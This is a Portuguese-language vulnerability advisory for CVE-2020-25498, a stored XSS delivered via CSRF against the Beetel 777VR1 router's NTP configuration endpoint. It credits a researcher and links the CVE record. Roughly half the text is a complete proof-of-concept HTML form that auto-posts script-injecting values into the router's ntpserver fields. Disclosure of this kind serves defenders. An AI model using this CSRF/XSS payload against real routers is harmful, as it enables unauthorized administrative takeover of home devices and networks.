
# XSS Armazenado via CSRF no Roteador Beetel 777VR1
Foi identificado que o endpoint vulnerável não possui validação de entrada no lado do servidor e não possui filtragem no lado do cliente para qualquer injeção de script malicioso. Um atacante pode usar esta vulnerabilidade para injetar script malicioso no endpoint e o script é ativado sempre que um usuário abre o endpoint vulnerável. O atacante pode enviar uma URL maliciosa com payload de requisição POST para executar XSS no módulo de administração via CSRF para assumir o controle do dispositivo e, finalmente, assumir o controle da rede.
Pesquisadora: Sayli Ambure (https://twitter.com/sayli_ambure)
Link MITRE CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25498
Código HTML CSRF:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/form2ntp.cgi" method="POST">
<input type="hidden" name="ntpstate" value="Enable" />
<input type="hidden" name="ntpserver" value='google.com"><script>alert(1)</script>' />
<input type="hidden" name="ntpserver2" value='google.com"><script>alert(2)</script>' />
<input type="hidden" name="ntpinterval" value="1" />
<input type="hidden" name="ntptimezone" value="330" />
<input type="hidden" name="submit.htm?time.htm" value="Send" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Parâmetro: Nome do servidor
Parâmetro: Palavra-chave